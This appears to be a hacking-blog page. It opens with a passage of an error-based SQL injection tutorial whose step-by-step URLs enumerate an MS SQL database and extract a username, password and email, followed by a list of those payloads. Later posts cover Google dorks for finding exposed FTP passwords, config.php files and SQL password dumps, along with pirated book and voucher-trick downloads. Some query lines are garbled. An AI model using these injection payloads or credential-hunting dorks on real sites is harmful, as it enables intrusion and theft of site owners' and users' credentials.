-If you want to column_name for users as' go:
For example:
-------------------------------------------------- -------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users'))--
-------------------------------------------------- -------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion failed when converting nvarchar value 'Name' to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
So colums name for the table (table_name) 'Users' the 'name'
Now find the column (column_name) other at the same table 'Users':
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users' and column_name (' name')))--
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- --------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is not a password when converting nvarchar value 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
columnes name (column_name) the other is 'password', now go find a rotating column_name:
For example:
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 column_name from information_schema.columns where table_name = 'users' and column_name ( 'name', 'password'))) --
-------------------------------------------------- -------------------------------------------------- -------------------------------------------------- ---------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion failed when converting nvarchar value 'emailaddress' to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Therefore, the third Colum_name 'emailaddress' and so on and on until the end, to find all of the columns (column_name)!
[1.7 How to get data that interest you (our user name, pass, email, etc.)]
################################################## ###
To do so you do not have anything to ndyshe we mentioned before.
In this section, all that needs to be done is to table (table_name), and the names of column (column_name) in their earlier results found.
In this section will be used:
Table_name = Users
Column_name = user name, password, emailaddress!
Some have now replaced the example:
-------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 name from Users)) --
-------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion is not an administrator when converting nvarchar value 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
user name : Administrator
Replacing now the first column "Name" in the second column "password":
For example:
-------------------------------------------------- -----------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top password from the user 1)) --
-------------------------------------------------- -----------------------------------------
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
Microsoft Amos DB Provider for SQL Server error '80040e07 '
Conversion failed when converting nvarchar value '123456 'to data type int.
/ MSN / shared / includes / main_rub.asp, Line 4
++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++
password: administratorpassword123
Now, instead of rotating columns works the same as above:
For example:
-------------------------------------------------- ---------------------------------------------
http://www.localhost.com/ / news.asp? id = 100 + or +1 = convert (int (select top 1 from users emailaddress)) --
-------------------------------------------------- ---------------------------------------------
emailaddress: king.cyborg@yahoo.com
Here then we have achieved some info on, and the name / pass and emailaddress page.
user name: Administrator
password: administratorpassword123
emailaddress: [email]king.cyborg@yahoo.com/email]
[ 1.8 Conclusion ]
############
================================================== ===========================
www.localhost.com/news.asp?id=100'
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(@@version))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...(db_name()))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 table_name from information_schema.tables where table_name not in ('Users' , 'members' , 'categories')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users'))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 column_name from information_schema.columns where table_name='Users' and column_name not in ('username' , 'password')))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 username from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 password from Users))--
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://www.localhost.com/news.asp?id...rt(int,(select top 1 emailaddress from Users))--
================================================== ===========================
Special Thnx to HackALL team
0 Learn how to get free skype credit !! (1000% working)
By rUsTlEs xEr0
1. download vpn and connect it
Click here to Download
2. After connect open the link given below.
http://skype.hotspotshield.com/banner.php
3. and press ok on free voucher code that will give you a voucher code.
4. Complete this step and log in into skype account put the voucher code and credit will be added into your account
0 Let Us C++ By Yashwant Kanetkar
and em dammm sure that you can easily understand because this book is also user friendly
By rUsTlEs xEr0
So Click Here to download this book....
0 C++
By rUsTlEs xEr0
if You guys are curious to find out a nice book on C++ then u don't need to go anywhere because here is the bundle of awesome books of C++ and it will obviously help you to make skills in C++
Click Here to download bundle....
if You guys are curious to find out a nice book on C++ then u don't need to go anywhere because here is the bundle of awesome books of C++ and it will obviously help you to make skills in C++
 |
| C++ |
0 Hack Google with Google Hacks
By rUsTlEs xEr0
i earlier blogged about some cool google dorks to search around,but it required precision and a bit of memorising capability (which I suppose we all are lacking nowdays :P). Here comes the rescue tool for the lazy - Google Hacks is a compilation of carefully crafted Google searches that expose novel functionality from Google's search
and map services. You can use it to view a timeline of your search results, view a map, search for music, search for books, and perform many other specific kinds of searches. You can also use this program to use Google as a proxy.As the website itself says,Google Hacks is A compact utility for several google hacks.Although its not good as the Gooscan-a far superior tool to scan for vulnerabilities in web,its well worth a try.
Google Hacks is well worth a shot,however I will be posting about better tools.You can download Google Hacks from the link given below
Download Google Hacks
i earlier blogged about some cool google dorks to search around,but it required precision and a bit of memorising capability (which I suppose we all are lacking nowdays :P). Here comes the rescue tool for the lazy - Google Hacks is a compilation of carefully crafted Google searches that expose novel functionality from Google's search
and map services. You can use it to view a timeline of your search results, view a map, search for music, search for books, and perform many other specific kinds of searches. You can also use this program to use Google as a proxy.As the website itself says,Google Hacks is A compact utility for several google hacks.Although its not good as the Gooscan-a far superior tool to scan for vulnerabilities in web,its well worth a try.Google Hacks is well worth a shot,however I will be posting about better tools.You can download Google Hacks from the link given below
Download Google Hacks
0 Advanced password hacking using Google – easy to learn, easy to apply
Google is your best friend when it comes to hacking. The search engine giant has crawled loads of data which was intended to be protected by webmasters, but
is being exploited and mined by smart users using Google dorks. Today I will be discussing some practical dorks which will help you gain passwords, databases and vulnerable directories. The basic methodology remains the same, query Google using specialized dorks with precise parameters and you are good to go. I assume you have basic working knowledge of google dorks.
is being exploited and mined by smart users using Google dorks. Today I will be discussing some practical dorks which will help you gain passwords, databases and vulnerable directories. The basic methodology remains the same, query Google using specialized dorks with precise parameters and you are good to go. I assume you have basic working knowledge of google dorks.
Lets start, shall we ?
FTP passwords
ws_ftp.ini is a configuration file for a popular win32 FTP client that stores usernames, (weakly) encoded passwords, sites and directories that the user can store for later reference.
intitle:index.of ws_ftp.ini
You can also this dork which uses "parent directory" to avoid results other than directory listings
filetype:ini ws_ftp pwdOr"index of/" "ws_ftp.ini" "parent directory"
even if the site or file has been taken offlline, you can still search the contents in the Google cache using the following dork
"cache:www.abc.com/ws_ftp.ini"wherewww.abc.com is the site you want to check the dork for.
The ws_ftp password uses quite weak encryption algorithm, hence once you get the password, you can break it using the decryptor provided here or from here.
PHP Hacking
Sites made in PHP have a file known as “config.php” which stores configuration and the username and password for the sql database the site is hosting. This password is required only once per transaction (i.e when ever admin logins or a transaction is committed at administrator level) and hence will be specified by the ‘require_once’ parameter in the config file or in index file.
intitle:index.of config.php
to view php file contents
intitle:"Index of" phpinfo.php
you can also try the directory traversal attack in php using the following dork
inurl:download.php?=filename
if you are lucky, substitute the filename with ‘index.php’, download it, read it and get the password (hint:if you are not able to find it, try looking for globals.php).
Since most websites today deny this trick, but you may get lucky with some :)
SQL Dumps
We will be hunting for SQL password dumps saved in database, here ext:sql specifies the type of password dump, e10adc3949ba59abbe56e057f20f883e is the md5 hash for 123456; one of the most common password people keep..and intext dork will allows to search inside the dump.
ext:sql intext:@gmail.com intext:e10adc3949ba59abbe56e057f20f883e
ext:sql intext:"INSERT INTO" intext:@somemail.com intext:password
Remember kids
- Use different email providers, substitute gmail/yahoomail instead of somemail ,or try custom domain mail providers.
- Use different file extensions.
- Use different type of hashes, some older ones might be using md4 and some others might be using other prominent encryption algorithms.
- just mix everything up and try different combinations :)
Its not over..Yet
A very flexible query can be used to hunt for WS_FTP.log which in turn can disclose valuable information about the server.
+htpasswd +WS_FTP.LOG filetype:log
You can substitute "+htpasswd" for "+FILENAME" & you may get several results not mentioned before using the normal search. You can further explore filenames by using keywords like
phpinfo, admin, MySQL, password, htdocs, root, Cisco, Oracle, IIS, resume, inc, sql, users, mdb, frontpage, CMS, backend, https, editor, intranet
The list goes on and on.. Also you cam try this dork to data mine information about the uploader
"allinurl: "some.host.com" WS_FTP.LOG filetype:log"
which tells you more about who's uploading files to a specific site, quite handy for some passive reconnaissance
Subscribe to:
Posts (Atom)
